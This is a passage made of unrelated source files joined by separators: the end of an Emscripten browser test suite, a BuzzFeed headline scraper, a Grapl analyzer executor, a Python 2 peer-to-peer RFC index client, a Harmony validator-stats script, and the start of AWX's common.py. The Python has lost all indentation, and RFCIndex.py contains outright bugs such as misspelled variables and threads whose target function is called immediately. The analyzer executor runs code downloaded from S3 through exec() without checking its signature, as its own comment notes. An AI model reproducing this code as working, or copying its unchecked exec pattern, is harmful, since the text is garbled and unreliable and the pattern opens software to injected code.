test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser', 'emmalloc_memgrowth.cpp'), expected='0', args=['-s', 'MALLOC=emmalloc', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'ABORTING_MALLOC=0', '-s', 'ASSERTIONS=2', '-s', 'MINIMAL_RUNTIME=1', '-s', 'MAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(test_file('pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser', 'test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
scrape_buzzfeed.py
|
import grequests
import json
import multiprocessing
from tqdm import tqdm
import threading
from html import unescape
write_buffer = multiprocessing.Queue()
def writer_thread():
with open('buzzfeed_dataset.txt', 'a+') as out:
count = 0
s = write_buffer.get(block=True)
while s:
out.write(s + '\n')
count += 1
if not count % 1000:
out.flush()
print ('Scraped and added {} titles...'.format(count))
s = write_buffer.get()
t = threading.Thread(target=writer_thread)
t.daemon = True
t.start()
def scrape(http_response):
feed = json.loads(http_response.text)
for i in feed['big_stories']:
write_buffer.put(unescape(i['title']), block=True)
for i in feed['buzzes']:
write_buffer.put(unescape(i['title']), block=True)
n_workers = 10
n_pages = 1000
pool = multiprocessing.Pool(n_workers)
buzzfeed_scrape = grequests.imap([grequests.get('http://www.buzzfeed.com/api/v2/feeds/index?p={}'.format(p)) for p in range(4001,n_pages+4001)])
pool.map(scrape, buzzfeed_scrape)
print('Scraping done')
write_buffer.put(None)
|
analyzer-executor.py
|
import base64
import hashlib
import json
import os
import traceback
from multiprocessing import Process, Pipe
from multiprocessing.connection import Connection
from multiprocessing.pool import ThreadPool
from typing import Any, Optional, Tuple
import boto3
import redis
from botocore.exceptions import ClientError
from grapl_analyzerlib.entities import SubgraphView, ProcessView, FileView
from grapl_analyzerlib.execution import ExecutionHit, ExecutionComplete, ExecutionFailed
from pydgraph import DgraphClientStub, DgraphClient
def parse_s3_event(event) -> str:
# Retrieve body of sns message
# Decode json body of sns message
print("event is {}".format(event))
msg = json.loads(event["body"])["Message"]
msg = json.loads(msg)
record = msg["Records"][0]
bucket = record["s3"]["bucket"]["name"]
key = record["s3"]["object"]["key"]
return download_s3_file(bucket, key)
def download_s3_file(bucket, key) -> str:
s3 = boto3.resource("s3")
obj = s3.Object(bucket, key)
return obj.get()["Body"].read()
def execute_file(name: str, file: str, graph: SubgraphView, sender, msg_id):
alpha_names = os.environ["MG_ALPHAS"].split(",")
exec(file, globals())
try:
pool = ThreadPool(processes=64)
results = []
for node in graph.node_iter():
if not node.node.node_key:
print(f'missing key {vars(node.node.node)} type: {type(node.node)}')
continue
if check_msg_cache(file, node.node.node_key, msg_id):
print('cache hit - already processed')
continue
if check_hit_cache(name, node.node.node_key):
print('cache hit - already matched')
continue
def exec_analyzer(analyzer, node, sender):
try:
client_stubs = [DgraphClientStub(f"{a_name}:9080") for a_name in alpha_names]
client = DgraphClient(*client_stubs)
analyzer(client, node, sender)
return node
except Exception as e:
print(traceback.format_exc())
print(f'Execution of {name} failed with {e} {e.args}')
sender.send(ExecutionFailed())
raise
exec_analyzer(analyzer, node, sender)
t = pool.apply_async(exec_analyzer, (analyzer, node, sender))
results.append(t)
pool.close()
for result in results:
node = result.get()
update_msg_cache(file, node.node.node_key, msg_id)
sender.send(ExecutionComplete())
except Exception as e:
print(traceback.format_exc())
print(f'Execution of {name} failed with {e} {e.args}')
sender.send(ExecutionFailed())
raise
def emit_event(event: ExecutionHit) -> None:
print("emitting event")
event_s = json.dumps(
{
"nodes": json.loads(event.nodes),
"edges": json.loads(event.edges),
"analyzer_name": event.analyzer_name,
"risk_score": event.risk_score,
}
)
event_hash = hashlib.sha256(event_s.encode())
key = base64.urlsafe_b64encode(event_hash.digest()).decode("utf-8")
s3 = boto3.resource("s3")
obj = s3.Object("grapl-analyzer-matched-subgraphs-bucket", key)
obj.put(Body=event_s)
# try:
# obj.load()
# except ClientError as e:
# if e.response['Error']['Code'] == "404":
# else:
# raise
MESSAGECACHE_ADDR = os.environ['MESSAGECACHE_ADDR']
MESSAGECACHE_PORT = os.environ['MESSAGECACHE_PORT']
message_cache = redis.Redis(host=MESSAGECACHE_ADDR, port=MESSAGECACHE_PORT, db=0)
HITCACHE_ADDR = os.environ['HITCACHE_ADDR']
HITCACHE_PORT = os.environ['HITCACHE_PORT']
hit_cache = redis.Redis(host=HITCACHE_ADDR, port=HITCACHE_PORT, db=0)
def check_msg_cache(file: str, node_key: str, msg_id: str) -> bool:
to_hash = str(file) + str(node_key) + str(msg_id)
event_hash = hashlib.sha256(to_hash.encode()).hexdigest()
return bool(message_cache.get(event_hash))
def update_msg_cache(file: str, node_key: str, msg_id: str):
to_hash = str(file) + str(node_key) + str(msg_id)
event_hash = hashlib.sha256(to_hash.encode()).hexdigest()
message_cache.set(event_hash, "1")
def check_hit_cache(file: str, node_key: str) -> bool:
to_hash = str(file) + str(node_key)
event_hash = hashlib.sha256(to_hash.encode()).hexdigest()
return bool(hit_cache.get(event_hash))
def update_hit_cache(file: str, node_key: str):
to_hash = str(file) + str(node_key)
event_hash = hashlib.sha256(to_hash.encode()).hexdigest()
hit_cache.set(event_hash, "1")
def lambda_handler(events: Any, context: Any) -> None:
# Parse sns message
print("handling")
print(events)
print(context)
alpha_names = os.environ["MG_ALPHAS"].split(",")
client_stubs = [DgraphClientStub("{}:9080".format(name)) for name in alpha_names]
client = DgraphClient(*client_stubs)
for event in events["Records"]:
data = parse_s3_event(event)
message = json.loads(data)
# TODO: Use env variable for s3 bucket
print(f'Executing Analyzer: {message["key"]}')
analyzer = download_s3_file(f"{os.environ['BUCKET_PREFIX']}-analyzers-bucket", message["key"])
analyzer_name = message["key"].split("/")[-2]
subgraph = SubgraphView.from_proto(client, bytes(message["subgraph"]))
# TODO: Validate signature of S3 file
rx, tx = Pipe(duplex=False) # type: Tuple[Connection, Connection]
p = Process(target=execute_file, args=(analyzer_name, analyzer, subgraph, tx, event['messageId']))
p.start()
t = 0
while True:
p_res = rx.poll(timeout=5)
if not p_res:
t += 1
print(f"Polled {analyzer_name} for {t * 5} seconds without result")
continue
result = rx.recv() # type: Optional[Any]
if isinstance(result, ExecutionComplete):
print("execution complete")
break
# emit any hits to an S3 bucket
if isinstance(result, ExecutionHit):
print(f"emitting event for {analyzer_name} {result.root_node_key}")
emit_event(result)
update_msg_cache(analyzer, result.root_node_key, message['key'])
update_hit_cache(analyzer_name, result.root_node_key)
assert not isinstance(
result, ExecutionFailed
), f"Analyzer {analyzer_name} failed."
p.join()
|
RFCIndex.py
|
import socket
import threading
import os
import platform
import time
ReqRFC_list = []
SERVER_NAME = ''
SERVER_PORT = 0
HOST = socket.gethostbyname(socket.gethostname())
LISTENING_PORT = 40000
OS = platform.system()
FilePath = ''
Cookieval = ''
class Peer_entry:
def __init__(self,hostname,cookie,actflag,ttl,port,actvcnt,recentlyactv,next_entry=None):
self.hostname = hostname
self.cookie = cookie
self.actflag = actflag
self.TTL = int(ttl)
self.list_port = int(port)
self.ActvCnt = int(actvcnt)
self.RecentlyActv = recentlyactv
self.next_entry = next_entry
def get_next(self):
return self.next_entry
def get_hostname(self):
return self.hostname
def get_cookie(self):
return self.cookie
def get_actflag(self):
return self.actflag
def get_TTL(self):
return self.TTL
def get_list_port(self):
return self.list_port
def get_ActvCnt(self):
return self.ActvCnt
def get_RecentlyActv(self):
return self.RecentlyActv
def set_next(self,new_next):
self.next_entry = new_next
def set_hostname(self,hostname):
self.hostname = hostname
def set_list_port(self,port):
self.list_port = port
def set_cookie(self,CookieNo):
self.cookie = CookieNo
def set_actflag(self,actflag):
self.actflag = actflag
def set_TTL(self,ttl):
self.TTL = ttl
def set_ActvCnt(self):
self.ActvCnt = actvcnt
def set_RecentlyActv(self):
self.RecentlyActv = recentlyactv
class Peer_Index():
def __init__(self,head=None):
self.head = head
def get_head(self):
return self.head
def set_head(self,head):
self.head = head
def CreateEntry(self,hostname,cookie,actflag,ttl,port,actvcnt,recentlyactv):
new_entry = Peer_entry(hostname,cookie,actflag,ttl,port,actvcnt,recentlyactv)
new_entry.set_next(self.head)
self.head = new_entry
def GetPort(self,hostname):
current = self.head
while current != None:
if current.hostname == hostname:
return current.get_list_port()
current = current.get_next()
print "ERROR! No Port found for %s\n" %(hostname)
def Display(self):
current = current.head
print "Hostname\tCookie\tActive Flag\tTTL\tListening Port\tRegistration count\tRecent Registration time\n"
while current != None:
print "%s\t%s\t%s\t%d\t%d\t\t%d\t\t%s" %(current.hostname,current.cookie,current.actflag,current.TTL,current.list_port,current.actvcnt,current.recentlyactv)
current = current.next_entry
class RFC_Entry():
def __init__(self,RFCno=0,RFCtitle='',hostname=socket.gethostbyname(socket.gethostname()),ttl=7200,next_entry=None):
self.RFCno = int(RFCno)
self.RFCtitle = str(RFCtitle)
self.hostname = str(hostname)
self.TTL = int(ttl)
self.next_entry = next_entry
def get_next(self):
return self.next_entry
def get_RFCno(self):
return self.RFCno
def get_RFCtitle(self):
return self.RFCtitle
def get_hostname(self):
return self.hostname
def get_TTL(self):
return self.TTL
def set_next(self,new_next):
self.next_entry = new_next
def set_ttl(self,ttl):
self.TTL = ttl
class RFC_Index():
def __init__(self,head=None):
self.head = head
def get_head(self):
return self.head
def CreateEntry(self,RFCno,RFCtitle,hostname,ttl):
new_entry = RFC_Entry(RFCno,RFCtitle,hostname,ttl)
current = self.head
while current.next_entry != None:
current = current.next_entry
current.next_entry = new_entry
def LocalRFC_Search(self,RFCno): #Create required RFC list
current = self.head #Create socket to RS if not present
while current != None:
if current.hostname == HOST:
if current.RFCno == RFCno:
print "RFC %d is already present on the system\n" %(RFCno)
return True
current = current.next_entry
print "Contacting RS server for obtaining RFC %d......\n" %(RFCno)
return False
def Check_DuplicateEntry(self,RFCno,hostname): #Check for duplicate entry before appending peer RFC Index to local Index
current = self.head
while current != None:
if current.RFCno == RFCno and current.hostname == hostname:
return True
else:
current = current.next_entry
return False
def SearchRFC_Index(self,RFCno): #Search for required RFC in final RFC Index
current = self.head #Search each peer's RFC list
ststus = False
print "Searching Merged RFC-Index....\n"
while current != None:
if current.hostname != HOST:
if current.RFCno == RFCno:
status = True
return (status,current.hostname)
current = current.next_entry
print " RFC %d is not found !\n"
return (status,None)
#def UpdateRFC_List(): #Update RFC Index and local file list
def GenerateIndex_Response(self):
global HOST
global OS
current = self.head
message = "P2P-DI/1.0(%^&***)200(%^&***)OK(%^&***)Host:(%^&***)"+HOST+"(%^&***)OS:(%^&***)"+OS
while current != None:
data = str(current.get_RFCno())+'(%^&***)'+str(current.get_RFCtitle())+'(%^&***)'+str(current.get_hostname())+'(%^&***)'+str(current.get_TTL())
message = message +"(%^&***)"+data
print "...\n"
current = current.next_entry
return message
def Get_LocalFile_List(): #Create entries for local files
global FilePath #Write local file list to a file
files = []
for file in os.listdir(FilePath):
if file.endswith(".txt"):
files.append(os.path.splitext(file)[0])
return files
def ServerMain(csocket,addr,object):
global FilePath
global HOST
global OS
msg = csocket.recv(1024)
message = str.split(msg,"(%^&***)")
if message[0] == 'GET':
if message[1] == 'RFC-INDEX':
response = object.GenerateIndex_Response()
print "Sending RFC-INDEX to %s.....\n" %(str(addr))
csocket.send(response)
print "Finished sending RFC-Index to %s\n" %(str(addr))
elif message[1] == 'RFC':
os.chdir(FilePath) #Changes CWD to 'CWD\IP_Project'
print "Sending RFC %s to %s......\n" %(message[2],str(addr))
response = "P2P-DI/1.0(%^&***)200(%^&***)OK(%^&***)Host:(%^&***)"+HOST+"(%^&***)OS:(%^&***)"+OS
#socket.send(response)
filename = str(message[2])+".txt"
if os.path.isfile(filename):
with open(filename,"r") as f:
#response = f.read(1024)
#socket.send(response)
#while response != "":
filedata = f.read()
response = response +"(%^&***)"+filedata
csocket.send(response)
print "Finished sending RFC %s to %s\n" %(message[2],str(addr))
csocket.close()
def ServerModule(object):
server_socket = socket.socket()
server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
server_socket.bind((HOST,LISTENING_PORT))
server_socket.listen(25)
while True:
client_socket,addr = server_socket.accept()
print "Connection from: " + str(addr)
MainThread = threading.Thread(target=ServerMain(),args=(client_socket,addr,object))
MainThread.start()
def Generate_KeepAlive():
global SERVER_NAME
global SERVER_PORT
global HOST
global OS
global Cookieval
KAsock = socket.socket()
KAsock.connect((SERVER_NAME,SERVER_PORT))
while True:
time.sleep(300)
message = "KEEPALIVE(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)Cookie:(%^&***)"+Cookieval+"(%^&***)OS:(%^&***)"+OS
KAsock.send(message)
KAsock.close()
#def ClientModule():
def main():
global SERVER_NAME
global SERVER_PORT
global HOST
global LISTENING_PORT
global OS
global ReqRFC_list
global FilePath
global Cookieval
wd = os.getcwd()
if OS == "Windows":
directory = wd+"\IP_Project"
else:
directory = wd+"/IP_Project"
if not os.path.exists(directory):
os.makedirs(directory)
FilePath = directory
os.chdir(FilePath)
RFCtable = RFC_Index()
Peertable = Peer_Index()
print "Hello"
#MainThread = threading.Thread(target=ServerModule(),args=(RFCtable))
#MainThread.start()
print "Hello again"
SERVER_NAME = '127.0.0.1'
SERVER_PORT = 65423
Cookieval = None
s = socket.socket()
s.connect((SERVER_NAME,SERVER_PORT))
print "SERVER CONNECT"
if os.path.isfile("Cookie.txt"):
with open("Cookie.txt","r") as f:
Cookieval = f.read()
else:
Cookieval = None
if Cookieval != None:
message = "REGISTER(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)Cookie:(%^&***)"+Cookeival+"(%^&***)Port:(%^&***)"+str(LISTENING_PORT)+"(%^&***)OS:(%^&***)"+OS
else:
message = "REGISTER(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)Port:(%^&***)"+str(LISTENING_PORT)+"(%^&***)OS:(%^&***)"+OS
s.send(message)
rep = s.recv(1024)
reply = str.split(rep,"(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
print "Peer %s registered with RS\n" %(str(s.getsockname()))
Cookieval = str(reply[4])
f = open("Cookie.txt","w+")
f.write(Cookieval)
f.close()
s.close()
Keep_AliveThread = threading.Thread(target=Generate_KeepAlive(),args=())
Keep_AliveThread.start()
localfiles = Get_LocalFile_List()
if not localfiles:
print "No RFCs on localhost\n"
else:
print "Updating local RFCs to RFC-Index..\n"
for files in localfiles:
RFCtable.CreateEntry(files,'',HOST,7200)
start_time_cummulative = time.time()
for RFCno in ReqRFC_list:
status = RFCtable.LocalRFC_Search(RFCno)
if status == False:
start_time_each = time.time()
s = socket.socket()
s.connect((SERVER_NAME,SERVER_PORT))
message = "GET(%^&***)PEER-INDEX(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)Cookie:(%^&***)"+Cookieval+"(%^&***)OS:(%^&***)"+OS
print "Requesting Peer-Index from RS....\n"
s.send(message)
rep = s.recv(4096)
reply = str.split(rep,"(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
Peertable.set_head(None) # To CHECK!!
idx = 7
while (idx < len(reply)):
Peertable.CreateEntry(reply[idx],reply[idx+1],reply[idx+2],reply[idx+3],reply[idx+4],reply[idx+5],reply[idx+6])
idx = idx + 7
print "...\n"
print "Peer-Index successfully downloaded on %s" %(str(s.getsockname()))
s.close()
current = Peertable.get_head()
while current != None:
if current.hostname != HOST:
peername = current.get_hostname()
peerport = current.get_list_port()
s = socket.socket()
s.connect((peername,peerport))
message = "GET(%^&***)RFC-INDEX(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)OS:(%^&***)"+OS
print "Requesting RFC-Index from Peer %s:%s....\n" %(peername,str(peerport))
s.send(message)
rep = s.recv(4096)
reply = str.split(rep,"(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
idx = 7
while (idx < len(reply)):
res = RFCtable.Check_DuplicateEntry(reply[idx],reply[idx+2])
if res == False:
RFCtable.CreateEntry(reply[idx],reply[idx+1],reply[idx+2],reply[idx+3])
idx = idx + 4
print "...\n"
print "RFC-Index successfully downloaded on %s\n" %(str(s.getsockname()))
else:
print "ERROR while downloading RFC-Index from peer %s:%s\n" %(peername,str(peerport))
s.close()
(status,peername)= SearchRFC_Index(RFCno)
if status == True:
peerport = Peertable.GetPort(peername)
s = socket.socket()
s.connect((peername,peerport))
message = "GET(%^&***)RFC(%^&***)"+RFCno+"(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)OS:(%^&***)"+OS
print "Requesting RFC %d from peer %s:%s..\n" %(RFCno,peername,str(peerport))
s.send(message)
rep = s.recv(4096)
reply = str.split(rep,"(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
idx = 7
filename = str(RFCno)+".txt"
f = open(filename,"w+")
f.write(reply[7])
f.close()
end_time_each = time.time()
print "RFC %d successfully downloaded!\n" %(RFCno)
s.close()
break
s.close()
final_time_each = end_time_each - start_time_each
f = open("Timer.txt","a+")
try:
f.write("\nThe time taken for obtaining RFC "+str(RFCno)+": "+str(final_time_each))
finally:
f.close()
current = current.get_next()
if current == None:
print "RFC %d is not present with any peer\n" %(RFCno)
end_time_cumulative = time.time()
final_time_cumulative = end_time_cumulative - start_time_cumulative
f = open("Timer.txt","a+")
try:
f.write("\nThe cumulative time taken for obtaining all required RFCs: "+str(final_time_cumulative))
finally:
f.close()
print "Completed searching for all required RFCs\n"
s = socket.socket()
s.connect((SERVER_NAME,SERVER_PORT))
message = "LEAVE(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)Cookie:(%^&***)"+Cookieval+"(%^&***)OS:(%^&***)"+OS
s.send(message)
rep = s.recv(1024)
reply = str.split(rep,"(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
print "Leaving the peer network...BYE :("
s.close()
if __name__ == '__main__':
main()
|
validator_stats.py
|
#!/usr/bin/env python3
# Usage: python3 validator_stats.py
import csv
import json
import argparse
import requests
import re
from collections import defaultdict
from queue import Queue
from threading import Thread
csv_link = 'https://docs.google.com/spreadsheets/d/e/2PACX-1vTUUOCAuSgP8TcA1xWY5AbxaMO7OSowYgdvaHpeMQudAZkHkJrf2sGE6TZ0hIbcy20qpZHmlC8HhCw1/pub?gid=0&single=true&output=csv'
encoding = 'utf-8'
groups = ['team', 'p-ops', 'foundational nodes', 'p-volunteer', 'hackers', 'community', 'partners', 'ankr']
headers = {'Content-Type': 'application/json'}
def get_all_validators(endpoint) -> list:
v_print("-- hmy_getAllValidatorAddresses --")
payload = {"id": "1", "jsonrpc": "2.0",
"method": "hmy_getAllValidatorAddresses",
"params": []}
r = requests.request('POST', endpoint, headers = headers, data = json.dumps(payload), timeout = 30)
return json.loads(r.content)['result']
def get_all_keys(endpoint) -> dict:
v_print("-- hmy_getSuperCommittees --")
payload = {"id": "1", "jsonrpc": "2.0",
"method": "hmy_getSuperCommittees",
"params": []}
r = requests.request('POST', endpoint, headers = headers, data = json.dumps(payload), timeout = 30)
return json.loads(r.content)['result']
def read_csv(csv_file) -> (dict, list):
v_print("-- Processing CSV --")
r = requests.get(csv_file)
s = [x.decode(encoding) for x in r.content.splitlines()]
d = defaultdict(list)
v = []
dup_list = []
for line in csv.reader(s):
group = line[1].strip()
email = line[3].strip()
address = line[7].strip()
if group in groups and re.match('one1', address) != None:
if re.search('/[0-9]+$', email) != None or re.search('www.ankr.com', email) != None:
v_print("Skipping: %s" % address)
dup_list.append(address)
else:
v_print("Adding: %s" % address)
d[group].append(address)
v.append(address)
return d, v, dup_list
def get_validator_information(endpoint, validators) -> dict:
v_print("-- hmy_getValidatorInformation --")
validator_information = {}
def collect_validator_information(validator, endpoint, q):
payload = {"id": "1", "jsonrpc": "2.0",
"method": "hmy_getValidatorInformation",
"params": [validator]}
r = requests.request('POST', endpoint, headers = headers, data = json.dumps(payload), timeout = 30)
try:
q.put((validator, json.loads(r.content)['result']))
except:
q.put((validator, None))
threads = []
q = Queue(maxsize = 0)
for v in validators:
v_print("Address: %s" % v)
threads.append(Thread(target = collect_validator_information, args = (v, endpoint, q)))
batch = []
for t in threads:
batch.append(t)
t.start()
if len(batch) == 10:
for b in batch:
b.join()
batch = []
for b in batch:
b.join()
while not q.empty():
val, out = q.get()
validator_information[val] = out
return validator_information
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--endpoint', default = 'https://api.s0.os.hmny.io', help = 'Network endpoint')
parser.add_argument('--csv_link', default = csv_link, help = 'File to read for groups & addresses')
parser.add_argument('--verbose', default = False, action = 'store_true', help = 'Verbose print for debug')
args = parser.parse_args()
if args.verbose:
def v_print(s):
print(s)
else:
def v_print(s):
return
network_validators = get_all_validators(args.endpoint)
committee = get_all_keys(args.endpoint)
by_group, csv_validators, extra_validators = read_csv(args.csv_link)
new_validators = [x for x in network_validators if x not in csv_validators and x not in extra_validators]
validator_information = get_validator_information(args.endpoint, network_validators)
v_print("-- Processing data --")
external_bls_keys = []
for x in committee['current']['quorum-deciders'].keys():
for y in committee['current']['quorum-deciders'][x]['committee-members']:
if not y['is-harmony-slot']:
external_bls_keys.append(y['bls-public-key'])
elected_validators = [v for v in network_validators if validator_information[v]['currently-in-committee'] == True]
eligible_validators = [v for v in network_validators if validator_information[v]['epos-status'] == 'eligible to be elected next epoch']
not_eligible_validators = [v for v in network_validators if validator_information[v]['epos-status'] == 'not eligible to be elected next epoch']
earned_validators = [v for v in network_validators if validator_information[v]['lifetime']['reward-accumulated'] > 0]
per_group_earning_validators = defaultdict(list)
per_group_created_validators = defaultdict(list)
per_group_elected_validators = defaultdict(list)
for g in by_group.keys():
for v in by_group[g]:
if v in validator_information.keys():
per_group_created_validators[g].append(v)
if validator_information[v]['lifetime']['reward-accumulated'] > 0:
per_group_earning_validators[g].append(v)
if validator_information[v]['currently-in-committee']:
per_group_elected_validators[g].append(v)
print("-- Total Validator Stats --")
print("Total created validators: %d" % len(network_validators))
print("Validators that have earned rewards: %d" % len(earned_validators))
print("Elected validators: %d" % len(elected_validators))
print("Eligible validators: %d" % len(eligible_validators))
print("Not eligible validators: %d" % len(not_eligible_validators))
print("Current keys in committee: %d" % len(external_bls_keys))
print()
print("-- Created Validators Per Group --")
total_csv_created_validators = 0
for g in per_group_created_validators.keys():
c = len(per_group_created_validators[g])
print("Group: %-20s Number: %d" % (g, c))
total_csv_created_validators += c
print("Total: %d" % total_csv_created_validators)
print()
print("-- Earned Validators Per Group --")
total_csv_earned_validators = 0
for g in per_group_earning_validators.keys():
c = len(per_group_earning_validators[g])
print("Group: %-20s Number: %d" % (g, c))
total_csv_earned_validators += c
print("Total: %d" % total_csv_earned_validators)
print()
print("-- Elected Validators Per Group")
total_csv_elected_validators = 0
for g in per_group_elected_validators.keys():
c = len(per_group_elected_validators[g])
print("Group: %-20s Number: %d" % (g, c))
total_csv_elected_validators += c
print("Total: %d" % total_csv_elected_validators)
print()
print("-- New Validators --")
print("New Validators: %d" % len(new_validators))
for n in new_validators:
print("Address: %s, Validator Name: %s, Security Contact: %s, Website: %s" % (n, validator_information[n]['validator']['name'], validator_information[n]['validator']['security-contact'], validator_information[n]['validator']['website']))
|
common.py
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import json
import yaml
import logging
import os
import re
import subprocess
import stat
import urllib.parse
import threading
import contextlib
import tempfile
import psutil
from functools import reduce, wraps
from decimal import Decimal
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import (
ForwardManyToOneDescriptor,
ManyToManyDescriptor
)
from django.db.models.query import QuerySet
from django.db.models import Q
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.apps import apps
logger = logging.getLogger('awx.main.utils')
__all__ = ['get_object_or_400', 'camelcase_to_underscore', 'underscore_to_camelcase', 'memoize', 'memoize_delete',
'get_ansible_version', 'get_ssh_version', 'get_licenser', 'get_awx_version', 'update_scm_url',
'get_type_for_model', 'get_model_for_type', 'copy_model_by_class', 'region_sorting',
'copy_m2m_relationships', 'prefetch_page_capabilities', 'to_python_boolean',
'ignore_inventory_computed_fields', 'ignore_inventory_group_removal',
'_inventory_updates', 'get_pk_from_dict', 'getattrd', 'getattr_dne', 'NoDefaultProvided',
'get_current_apps', 'set_current_apps',
'extract_ansible_vars', 'get_search_fields', 'get_system_task_capacity', 'get_cpu_capacity', 'get_mem_capacity',
